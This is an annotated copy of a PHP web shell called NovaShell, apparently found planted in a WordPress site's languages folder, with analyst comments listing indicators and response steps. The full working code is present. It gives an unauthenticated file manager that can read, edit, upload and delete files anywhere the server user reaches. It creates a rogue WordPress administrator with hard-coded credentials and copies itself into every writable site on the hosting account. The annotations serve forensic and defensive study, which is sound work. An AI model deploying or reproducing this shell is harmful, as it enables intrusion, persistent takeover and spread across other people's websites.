File: /var/www/intranet.kauko.lt/wp-content/languages/card.php
<?php
/*
=========================================================
🚀 NovaShell v2 — Stealth PHP Shell
Features:
- Minimal file manager
- WP Admin auto-creator
- Self-replication to /uxxx/domains
- Simple file editing/upload
- Cyber Yellow themed interface
=========================================================
Notes:
- Default replication target = card.php
- Tested on typical cPanel account structures
- Colors adjusted to single cyber yellow for better stealth
=========================================================
*/
// Analyst note: error reporting is switched off for the whole request, so
// failed file operations further down are not expected to surface as PHP
// errors. Absence of PHP errors is therefore not evidence of inactivity.
error_reporting(0);
// === Path Control ===
// The working directory for every handler below comes from the `path` query
// parameter. It is resolved with realpath() and accepted if it is any existing
// directory; nothing here confines it to the web root. Scope the exposure as
// "everything the PHP process user can read or write", not just this folder.
// Detection: requests to this script whose query string carries `path=` with
// an absolute filesystem path.
$baseDir = getcwd();
$path = isset($_GET['path']) ? realpath($_GET['path']) : $baseDir;
// Falls back to the script's current directory when the parameter is missing,
// does not resolve, or is not a directory.
if (!$path || !is_dir($path)) $path = $baseDir;
// === Breadcrumb Generator ===
// Analyst note: renders the current directory as a row of links, one per path
// segment. Each link points back at this script with `?path=` set to the
// cumulative, URL-encoded path up to that segment.
// $dir: absolute directory path. Returns an HTML string (<div class='crumbs'>).
function breadcrumbs($dir) {
$parts = explode('/', trim($dir, '/'));
$build = '/';
$html = "<div class='crumbs'>📂 Path: ";
foreach ($parts as $seg) {
// $build grows by one segment per iteration, so every ancestor directory gets a link.
$build .= "$seg/";
$html .= "<a href='?path=" . urlencode($build) . "'>$seg</a>/";
}
return $html . "</div>";
}
// === Directory Listing ===
// Analyst note: builds the file-manager listing for $dir as an HTML <ul>.
// The links it emits define the query parameters that appear in access logs
// when the panel is used:
//   path=<dir>                  browse a directory
//   path=<dir>&view=<name>      display a file
//   path=<dir>&edit=<name>      open a file in the editor
//   delete=<full path>          remove a file or folder
// These parameter names are useful search terms when reconstructing activity.
function dirList($dir) {
$list = scandir($dir);
$html = '';
foreach ($list as $item) {
// Skip the self and parent directory entries.
if ($item === '.' || $item === '..') continue;
$full = "$dir/$item";
if (is_dir($full)) {
// Directories: a browse link plus a delete link.
$html .= "<li>📁 <a class='yellow' href='?path=" . urlencode($full) . "'>$item</a>
<a class='yellow' href='?delete=" . urlencode($full) . "' onclick='return confirm(\"Delete folder?\")'>[x]</a></li>";
} else {
// Files: view, edit and delete links.
$html .= "<li>📄 <a class='yellow' href='?path=" . urlencode($dir) . "&view=" . urlencode($item) . "'>$item</a>
<a class='yellow' href='?path=" . urlencode($dir) . "&edit=" . urlencode($item) . "'>[✏]</a>
<a class='yellow' href='?delete=" . urlencode($full) . "' onclick='return confirm(\"Delete file?\")'>[x]</a></li>";
}
}
return "<ul>$html</ul>";
}
// === Replication Function ===
// Analyst note: lateral-spread routine. Writes $payload as `card.php` into the
// public_html directory of every site found under a shared hosting account.
// $payload: file contents to write (the caller passes this script's own bytes).
// Returns the list of http://<domain>/card.php URLs it managed to write, or []
// when no matching account directory is found or it has already run.
//
// Containment and hunting implications:
// - One compromised site is enough to reach every sibling site whose
//   public_html is writable by the same PHP user; treat the whole hosting
//   account as affected, not only the site where the file was found.
// - Search each domains/*/public_html for a file named card.php and compare
//   it against this sample.
// - Per-site ownership and permissions, so one site's PHP user cannot write
//   into another site's docroot, is the control that stops this step.
function replicateNova($payload) {
// Static guard: the walk runs at most once per request.
static $done = false;
if ($done) return [];
$done = true;
// Walk upward from this script's directory towards the filesystem root.
$start = __DIR__;
while ($start !== '/') {
// Looks for a directory whose name starts with "u" followed by word
// characters and which contains a `domains` subdirectory (the author's
// banner describes this as the "/uxxx/domains" layout).
if (preg_match('/\/u[\w]+$/', $start) && is_dir("$start/domains")) {
$foundURLs = [];
foreach (scandir("$start/domains") as $dom) {
if ($dom === '.' || $dom === '..') continue;
$pubDir = "$start/domains/$dom/public_html";
if (is_writable($pubDir)) {
// Fixed target name: an existing card.php at this path is overwritten.
$targetFile = "$pubDir/card.php";
if (file_put_contents($targetFile, $payload)) {
// The directory name is assumed to be the site's hostname when building the URL.
$foundURLs[] = "http://$dom/card.php";
}
}
}
return $foundURLs;
}
$start = dirname($start);
}
return [];
}
// === Actions ===
// Delete
// Analyst note: deletion handler, triggered by the `delete` query parameter.
// The target is resolved with realpath() and acted on only when the resolved
// path begins with the script's current working directory string and exists.
// Directories go through rmdir(), files through unlink().
// Forensics: `delete=` values in access logs name what was removed; check
// them against backups for missing logs, plugins or other evidence.
if (isset($_GET['delete'])) {
$tgt = realpath($_GET['delete']);
if (strpos($tgt, getcwd()) === 0 && file_exists($tgt)) {
is_dir($tgt) ? rmdir($tgt) : unlink($tgt);
echo "<p class='log yellow'>🗑️ Deleted: " . basename($tgt) . "</p>";
}
}
// WP Admin Creation
// Analyst note: persistence via a rogue WordPress administrator, triggered by
// the `wp_admin` query parameter (the panel's button sends wp_admin=1).
// Indicators taken from this sample: login `nova`, e-mail `nova@galaxy.com`.
// Response checklist:
// - Look in the WordPress user table for that login or e-mail, and for any
//   other administrator created around the same time.
// - Remove the account, invalidate its sessions and review what it changed
//   (plugins, themes, options, other users).
// - Deleting this file does not remove the account; it lives in the database.
// - Because the user is created through WordPress' own API after loading
//   wp-load.php, it will look like a normal account record.
if (isset($_GET['wp_admin'])) {
// Walk upward from the browsed directory until a WordPress install is found.
$wppath = $path;
while ($wppath !== '/') {
if (file_exists("$wppath/wp-load.php")) break;
$wppath = dirname($wppath);
}
if (file_exists("$wppath/wp-load.php")) {
// Bootstraps WordPress so its user-management functions become available.
require_once("$wppath/wp-load.php");
// Hard-coded credentials: identical on every host running this sample.
$user = 'nova'; $pass = 'Nova@2025'; $mail = 'nova@galaxy.com';
if (!username_exists($user) && !email_exists($mail)) {
$uid = wp_create_user($user, $pass, $mail);
$wp_user = new WP_User($uid);
// Promotes the new account to full administrator.
$wp_user->set_role('administrator');
echo "<p class='log yellow'>✅ WP Admin 'nova' created</p>";
} else {
// This branch means the login or e-mail is already in the database,
// e.g. from an earlier run.
echo "<p class='log yellow'>⚠️ User or email exists</p>";
}
} else {
echo "<p class='log yellow'>❌ WP not found</p>";
}
}
// View
// Analyst note: file disclosure handler. Reads the file named by `view`
// (reduced to its base name) from the directory selected by `path` and prints
// it HTML-escaped. Since `path` may be any directory, any file the PHP user can
// read was within reach: treat secrets in such files (for example database
// credentials and keys in wp-config.php) as exposed and rotate them.
// Forensics: `view=` values in access logs show which files were displayed.
if (isset($_GET['view'])) {
$f = basename($_GET['view']);
echo "<h3>📄 Viewing: $f</h3><pre>" . htmlspecialchars(file_get_contents("$path/$f")) . "</pre><hr>";
}
// Edit
// Analyst note: file modification handler. With `edit` in the query string, a
// POST overwrites <path>/<basename of edit> with the `data` form field, then
// the current contents are shown in an editor form.
// Forensics: the target name is in the query string, but the written content
// travels in the POST body, which access logs typically do not record. Rely
// on file timestamps and comparison against known-good copies (core, plugin
// and theme checksums, backups) to find what was altered.
if (isset($_GET['edit'])) {
$f = basename($_GET['edit']);
$fp = "$path/$f";
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
// Writes the submitted text verbatim; creates the file if it does not exist.
file_put_contents($fp, $_POST['data']);
echo "<p class='log yellow'>✅ Saved</p>";
}
$src = htmlspecialchars(file_get_contents($fp));
echo "<h3>✏️ Edit: $f</h3>
<form method='post'>
<textarea name='data' rows='20'>$src</textarea><br>
<button>💾 Save</button>
</form><hr>";
}
// Upload
// Analyst note: upload handler. Runs on any request that carries a file
// upload; the `file` field is moved into the directory selected by `path`
// under the client-supplied base name. No type or extension check is visible.
// Forensics: uploaded names are not in the URL, so look for files created in
// web-writable directories around the times this script received POSTs.
if ($_FILES) {
move_uploaded_file($_FILES['file']['tmp_name'], "$path/" . basename($_FILES['file']['name']));
echo "<p class='log yellow'>📤 Uploaded</p>";
}
// Mkdir
// Analyst note: directory creation handler. A POST with a non-empty `mk` field
// creates <path>/<basename of mk> unless something with that name exists.
// Unexpected new directories near the script are worth inspecting.
if (!empty($_POST['mk'])) {
$d = "$path/" . basename($_POST['mk']);
if (!file_exists($d)) {
mkdir($d);
echo "<p class='log yellow'>📁 Created</p>";
} else {
echo "<p class='log yellow'>⚠️ Exists</p>";
}
}
// === UI ===
// Analyst note: page shell for the panel. Stable strings usable as content
// signatures for file scanning or response inspection:
// `<title>NovaShell</title>` and the heading "NovaShell — Cyber Yellow Mode".
// Nothing in the lines shown checks a password, session or source address
// before the handlers above or this page run, so any party that learned the
// URL could have used it; do not assume a single operator when reading logs.
echo "<!DOCTYPE html><html><head><meta charset='utf-8'><title>NovaShell</title>
<style>
body { background:#000; color:#ff0; font-family:monospace; max-width:900px; margin:auto; padding:20px; }
a { color:#ff0; text-decoration:none; } a:hover { color:#ffc; }
ul { list-style:none; padding:0; }
textarea { width:100%; background:#111; color:#ff0; border:1px solid #333; }
button { background:#ff0; color:#000; padding:6px 12px; border:none; margin-top:5px; font-weight:bold; }
.yellow { color:#ff0; }
.crumbs { margin-bottom:10px; }
.log { padding:4px 0; }
</style></head><body>
<h2>🛸 NovaShell — Cyber Yellow Mode</h2>" . breadcrumbs($path) . "<hr>";
// WP Admin Button
// GET form: submitting it produces a request with `path=<dir>&wp_admin=1` in
// the query string, which is what to search for in access logs.
echo "<form method='get'>
<input type='hidden' name='path' value='" . htmlspecialchars($path) . "'>
<button name='wp_admin' value='1'>👤 Create WP Admin</button>
</form><br>";
// Replication
// Analyst note: replication trigger. Runs on every page load, but only when
// this copy is NOT named card.php; copies named card.php never spread.
// Replicas are written from this file's own bytes, so they should be
// byte-identical to the parent: one hash of the sample can be used to sweep
// the account. A card.php in a public_html directory implies a differently
// named parent copy exists or existed; look for it as the earlier artefact.
// NOTE(review): the path on the report line above the code is not a
// public_html directory, so that copy was presumably placed by other means;
// confirm from upload and access logs.
if (basename(__FILE__) !== 'card.php') {
$urls = replicateNova(file_get_contents(__FILE__));
if (!empty($urls)) {
// The written locations are echoed back to whoever loaded the page.
echo "<p class='yellow'>✅ Cloned into:</p><ul>";
foreach ($urls as $u) echo "<li><a href='$u' target='_blank'>$u</a></li>";
echo "</ul><hr>";
}
}
// Upload & mkdir
// Analyst note: two POST forms with no explicit action, so they submit to the
// URL currently loaded. The first sends a multipart upload in field `file`,
// the second a folder name in field `mk`; both are handled earlier in the file.
// POST requests to this script are therefore write activity (upload, mkdir or
// edit) and deserve priority when building the timeline.
echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='file'> <button>Upload</button></form><br>
<form method='post'>
📁 <input type='text' name='mk'> <button>Create Folder</button></form><br>";
// Listing of the directory selected by `path`.
echo dirList($path);
echo "</body></html>";
?>